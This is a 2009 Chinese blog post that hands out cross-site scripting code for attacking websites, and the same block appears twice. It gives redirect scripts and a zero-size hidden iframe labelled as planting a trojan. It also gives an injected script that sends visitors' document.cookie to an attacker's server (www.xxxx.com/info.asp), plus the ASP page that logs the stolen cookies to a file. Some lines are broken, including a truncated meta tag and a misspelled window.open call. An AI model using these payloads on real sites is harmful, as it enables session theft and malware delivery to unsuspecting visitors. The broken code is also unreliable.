跨站入侵常用代码 送给有用的朋友
作者:admin 日期:2009-11-28
<script>alert("天下2 http://tx2.netease.com ")</script> 列子
<meta http-equiv="refresh" c> 转向代码
<script language=vbscript> window.location.href="http://tx2.netease.com" </script> 指定转象百度!
<iframe name="I1" src="http://tx2.netease.com/" width="0" height="0"> </iframe> 挂马
用源码编辑模式在</tbody>前插入跨站代码:
<script>windows.open('http://www.xxxx.com/info.asp?msg='+document.cookie)</script>
Info.asp的内容:
<%
testfile=Server.MapPath("buhu.txt")
msg=Request("msg")
set fs=server.CreateObject("scripting.filesystemobject")
set thisfile=fs.OpenTextFile(testfile,8,True,0)
thisfile.WriteLine(""&msg& "")
thisfile.close
set fs = nothing
%>
<script language=vbscript>
window.location.href="http://www.xxxx.cn"
</script>
http://www.xxxx.cn为你的空间 盗取COOKIES
<meta http-equiv="refresh" c> 转向代码
<script language=vbscript> window.location.href="http://tx2.netease.com" </script> 指定转象百度!
<iframe name="I1" src="http://tx2.netease.com/" width="0" height="0"> </iframe> 挂马
用源码编辑模式在</tbody>前插入跨站代码:
<script>windows.open('http://www.xxxx.com/info.asp?msg='+document.cookie)</script>
Info.asp的内容:
<%
testfile=Server.MapPath("buhu.txt")
msg=Request("msg")
set fs=server.CreateObject("scripting.filesystemobject")
set thisfile=fs.OpenTextFile(testfile,8,True,0)
thisfile.WriteLine(""&msg& "")
thisfile.close
set fs = nothing
%>
<script language=vbscript>
window.location.href="http://www.xxxx.cn"
</script>
http://www.xxxx.cn为你的空间 盗取COOKIES
评论: 0 | 查看次数: 8536